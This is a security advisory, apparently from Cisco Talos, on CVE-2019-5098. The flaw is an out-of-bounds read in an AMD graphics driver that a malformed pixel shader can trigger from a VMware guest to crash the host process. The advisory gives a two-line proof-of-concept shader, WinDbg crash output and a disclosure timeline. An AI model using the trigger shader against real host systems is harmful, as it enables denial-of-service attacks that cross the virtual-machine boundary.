CVE-2019-5098
An exploitable out-of-bounds read vulnerability exists in AMD ATIDXX64.DLL driver, version 26.20.13001.29010. A specially crafted pixel shader can cause out-of-bounds memory read. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host.
AMD ATIDXX64.DLL (26.20.13001.29010) running on Radeon RX 550 / 550 Series
VMware Workstation 15 (15.1.0 build-13591040) with Windows 10 x64 as guestVM
http://amd.com
http://vmware.com
8.6 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE-125: Out-of-bounds Read
This vulnerability can be triggered by supplying a malformed pixel shader inside a VMware guest OS. Such an attack can be triggered from VMware guest usermode to cause an out-of-bounds memory read on vmware-vmx.exe process on host, or theoretically through WEBGL (remote website).
By modifying the shader instruction operand (in this case SINCOS instruction) to a previously uninitialized one (in this case V4, since only V0 is declared by DCL_INPUT_PS_SIV) it is possible to cause an out-of-bounds read.
Sample shader:
dcl_input_ps_siv constant v0.xyzw, position ; Declares a shader-input register (v0)
sincos r6.x, null, v4.xxxx ; Component-wise sin(theta) and cos(theta) for theta in radians.
Debugger output:
00007FFC379F8EDA | 8B 83 A4 00 00 00 | mov eax,dword ptr ds:[rbx+A4] |
00007FFC379F8EE0 | 48 8B 7B 20 | mov rdi,qword ptr ds:[rbx+20] |
00007FFC379F8EE4 | 44 8B 74 84 30 | mov r14d,dword ptr ss:[rsp+rax*4+30] | * rax=-1
The rax register does not seem to be easily controllable, so this issue only leads to crashing the vmware-vmx.exe process.
0:016> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for amdihk64.dll
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Read
Key : Analysis.CPU.Sec
Value: 3
Key : Analysis.Elapsed.Sec
Value: 34
Key : Analysis.Memory.CommitPeak.Mb
Value: 160
Key : Timeline.Process.Start.DeltaSec
Value: 193
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2019-08-25T13:26:28.621Z
Diff: 283762621 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2019-08-22T06:37:06.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2019-08-22T06:33:53.0Z
Diff: 193000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 400
MODLIST_WITH_TSCHKSUM_HASH: 13437b918b50e558b56f50c6a54bf0d11143a633
MODLIST_SHA1_HASH: 79ac638f549732d19dbe903080e0744bb873a97d
APPLICATION_VERIFIER_FLAGS: 0
DUMP_FLAGS: 12
DUMP_TYPE: 1
CONTEXT: (.ecxr)
rax=000001f9a5531ad8 rbx=00007fff53900000 rcx=00000000ffffffff
rdx=000001f9a5531ab8 rsi=0000000000000006 rdi=000001f9a5530098
rip=00007fff53d18a0d rsp=00000071801f8e20 rbp=0000000000440006
r8=0000000000000004 r9=00007fff5425fed4 r10=0000000000000001
r11=000001f9a57aa964 r12=000001f9a5530000 r13=0000000000000000
r14=0000000000000000 r15=000001f9a55311a0
iopl=0 nv up ei ng nz ac po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010296
atidxx64!AmdDxGsaFreeCompiledShader+0x3ae74d:
00007fff`53d18a0d 488b14c8 mov rdx,qword ptr [rax+rcx*8] ds:00000201`a5531ad0=????????????????
Resetting default scope
FAULTING_IP:
atidxx64!AmdDxGsaFreeCompiledShader+3ae74d
00007fff`53d18a0d 488b14c8 mov rdx,qword ptr [rax+rcx*8]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007fff53d18a0d (atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003ae74d)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 00000201a5531ad0
Attempt to read from address 00000201a5531ad0
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: vmware-vmx.exe
FOLLOWUP_IP:
atidxx64!AmdDxGsaFreeCompiledShader+3ae74d
00007fff`53d18a0d 488b14c8 mov rdx,qword ptr [rax+rcx*8]
READ_ADDRESS: 00000201a5531ad0
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 00000201a5531ad0
WATSON_BKT_PROCSTAMP: 5cce82c7
WATSON_BKT_PROCVER: 15.1.0.46741
PROCESS_VER_PRODUCT: VMware Workstation
WATSON_BKT_MODULE: atidxx64.dll
WATSON_BKT_MODSTAMP: 5d4cabd4
WATSON_BKT_MODOFFSET: 418a0d
WATSON_BKT_MODVER: 26.20.13001.29010
MODULE_VER_PRODUCT: Advanced Micro Devices, Inc. Radeon DirectX 11 Driver
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_HOST: CLAB
ANALYSIS_SESSION_TIME: 08-25-2019 15:26:28.0621
ANALYSIS_VERSION: 10.0.18914.1001 amd64fre
THREAD_ATTRIBUTES:
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x3268]
Frame: [0] : atidxx64!AmdDxGsaFreeCompiledShader
ID: [0n285]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x3268]
Frame: [0] : atidxx64!AmdDxGsaFreeCompiledShader
LAST_CONTROL_TRANSFER: from 00007fff53cdd1c4 to 00007fff53d18a0d
STACK_TEXT:
00000071`801f8e20 00007fff`53cdd1c4 : 000001f9`a5530000 00000000`00000000 000001f9`00000000 000001f9`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x3ae74d
00000071`801f8f00 00007fff`53a763e6 : 000001f9`a5530098 000001f8`11e56700 000001f9`a553bf00 000001f8`11e56701 : atidxx64!AmdDxGsaFreeCompiledShader+0x372f04
00000071`801f9170 00007fff`53a666a0 : 000001f8`11f29560 000001f9`a554edf8 00000000`00000004 000001f8`11f29560 : atidxx64!AmdDxGsaFreeCompiledShader+0x10c126
00000071`801f9330 00007fff`53a458f4 : 000001f8`11f29560 000001f8`11edeea0 00000071`801f9b70 000001f8`11f29560 : atidxx64!AmdDxGsaFreeCompiledShader+0xfc3e0
00000071`801f93b0 00007fff`53989334 : 00000000`00000001 00000071`801f9b70 000001f8`11edeea0 00000071`801f9b70 : atidxx64!AmdDxGsaFreeCompiledShader+0xdb634
00000071`801f9930 00007fff`5410e4e8 : 00000000`00000000 00000071`801f9a60 00000071`801f9b70 000001f9`981fad10 : atidxx64!AmdDxGsaFreeCompiledShader+0x1f074
00000071`801f9960 00007fff`540f3c1b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a4228
00000071`801f9ad0 00007fff`540f3752 : 00000000`00000000 000001f8`11edeba0 000001f9`981dea80 00000071`801fd7e0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78995b
00000071`801f9b30 00007fff`54124173 : 000001f8`11edeba0 00000000`00000000 000001f9`981d5000 00000071`801fd7e0 : atidxx64!AmdDxGsaFreeCompiledShader+0x789492
00000071`801fd790 00007fff`540f3627 : 00000000`00000040 000001f8`11f28800 000001f9`981e2490 000001f9`981e9c10 : atidxx64!AmdDxGsaFreeCompiledShader+0x7b9eb3
00000071`801fd7c0 00007fff`541c3041 : 00000000`00000000 00000071`801fdaf0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x789367
00000071`801fd820 00007fff`53984cba : 00000000`00000000 00000000`00000000 00000071`801fdaf0 00007fff`c5e9833d : atidxx64!AmdDxGsaFreeCompiledShader+0x858d81
00000071`801fd860 00007fff`53984b03 : 000001f9`981b36e0 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a9fa
00000071`801fd8a0 00007fff`5390c05e : 00000000`00000001 00000000`00000000 000001f8`102ec0d0 00000000`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a843
00000071`801fd930 00007fff`54077e26 : 00000000`00000000 00000071`801fdaf0 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
00000071`801fd970 00007fff`5391d8b1 : 000001f9`9dbb0508 000001f9`9dac4efc 000001f9`975f4b00 00007fff`c0426933 : atidxx64!AmdDxGsaFreeCompiledShader+0x70db66
00000071`801fdad0 00007fff`c0408ecc : 00000000`00000000 00000071`801fdcf0 000001f9`9dbb04f8 00007fff`c5ebb9a7 : atidxx64!XdxQueryTlsLookupTable+0x185c1
00000071`801fdbf0 00007fff`c041279f : 00000071`00000001 000001f9`975f0f18 000001f9`9dbb04f8 000001f9`975e7000 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
00000071`801fde50 00007fff`c04126da : 00000071`801fe530 00007fff`c05c23c8 000001f9`9dbb03b0 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
00000071`801fdee0 00007fff`c03fee48 : 000001f9`9dbb03e8 00000071`801fe530 00000071`801fe560 00007fff`c05c23c8 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
00000071`801fdf40 00007fff`c040b16d : 000001f8`00000000 000001f9`9dbb03b0 00000000`00000000 000001f8`0e990000 : d3d11!CDevice::CreateLayeredChild+0xc88
00000071`801fe380 00007fff`c040b940 : 000001f9`9dbb03b0 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
00000071`801fe4f0 00007fff`c03f14f4 : 000001f8`116d3730 00000000`00000009 000001f9`9dac4e60 000001f8`116d3f68 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
00000071`801fe6e0 00007fff`c03f1463 : 000001f9`9dac4e60 00000000`0000b000 00000071`801fe9c9 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
00000071`801fe740 00007fff`c03f11e8 : 000001f8`116d3f68 000001f9`9dac4e60 00000000`00000b54 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
00000071`801fe8f0 00007ff6`ae368af2 : 000001f9`a7b00160 00007ff6`ae0b0000 000001f8`116d3f68 000001f9`9e0c4520 : d3d11!CDevice::CreatePixelShader+0x28
00000071`801fe940 00007ff6`ae36a3d5 : 000001f9`a7b00160 00007ff6`ae0b0000 00007ff6`ae0b0000 000001f9`97fc0cc0 : vmware_vmx+0x2b8af2
00000071`801fea30 00007ff6`ae369252 : 000001f9`a7b080e0 00007ff6`ae0b0000 000001f9`a7b00160 000001f9`a7b00160 : vmware_vmx+0x2ba3d5
00000071`801ffa80 00007ff6`ae365741 : 00000000`fffe4000 000001f9`a7b00160 00000000`00000003 000001f9`9e370160 : vmware_vmx+0x2b9252
00000071`801ffad0 00007ff6`ae2c1af9 : 00007ff6`ae2c1a30 000001f9`9e370150 00000000`00000028 00007ff6`ae3a4120 : vmware_vmx+0x2b5741
00000071`801ffb10 00007ff6`ae252ad2 : 00000000`00000020 00007ff6`ae2c1a30 00000071`801ffc70 00000000`00000028 : vmware_vmx+0x211af9
00000071`801ffb70 00007ff6`ae250b9f : 00000071`801ffd90 00000000`00000020 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a2ad2
00000071`801ffd30 00007ff6`ae1a65c0 : 00000000`00000000 000001f8`10fb06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0b9f
00000071`801ffd60 00007ff6`ae6cc800 : 00007ff6`ae1a64a0 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65c0
00000071`801ffdb0 00007fff`c4c77bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c800
00000071`801ffe40 00007fff`c5eece71 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
00000071`801ffe70 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
THREAD_SHA1_HASH_MOD_FUNC: 3fa94a1f85e4f43faa127ed96cd9d3a8a7f2e6dc
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 63d3ad5da187eccdbf6cfaca1763fe0d4d5b2789
THREAD_SHA1_HASH_MOD: 4aa76dab8657f0bc99ca0a6f86ebd46f8e0744d8
FAULT_INSTR_CODE: c8148b48
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: atidxx64!AmdDxGsaFreeCompiledShader+3ae74d
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: atidxx64
IMAGE_NAME: atidxx64.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5d4cabd4
STACK_COMMAND: ~16s ; .ecxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_atidxx64.dll!AmdDxGsaFreeCompiledShader
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_atidxx64!AmdDxGsaFreeCompiledShader+3ae74d
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: atidxx64.dll
BUCKET_ID_IMAGE_STR: atidxx64.dll
FAILURE_MODULE_NAME: atidxx64
BUCKET_ID_MODULE_STR: atidxx64
FAILURE_FUNCTION_NAME: AmdDxGsaFreeCompiledShader
BUCKET_ID_FUNCTION_STR: AmdDxGsaFreeCompiledShader
BUCKET_ID_OFFSET: 3ae74d
BUCKET_ID_MODTIMEDATESTAMP: 5d4cabd4
BUCKET_ID_MODCHECKSUM: 1acdd90
BUCKET_ID_MODVER_STR: 26.20.13001.29010
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_READ_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: atidxx64.dll!AmdDxGsaFreeCompiledShader
TARGET_TIME: 2019-08-22T06:37:06.000Z
OSBUILD: 18362
OSSERVICEPACK: 86
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
SUITE_MASK: 256
PRODUCT_TYPE: 1
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
OS_LOCALE:
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: 8750
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_c0000005_atidxx64.dll!amddxgsafreecompiledshader
FAILURE_ID_HASH: {08b458dc-1323-2abb-9f1a-d0ac543a793c}
Followup: MachineOwner
---------
2019-09-03 - Vendor disclosure
2019-11-08 - Vendor patched
2019-12-04 - Vendor updated release notes
2019-12-05 - Public release
Discovered by Piotr Bania of Cisco Talos.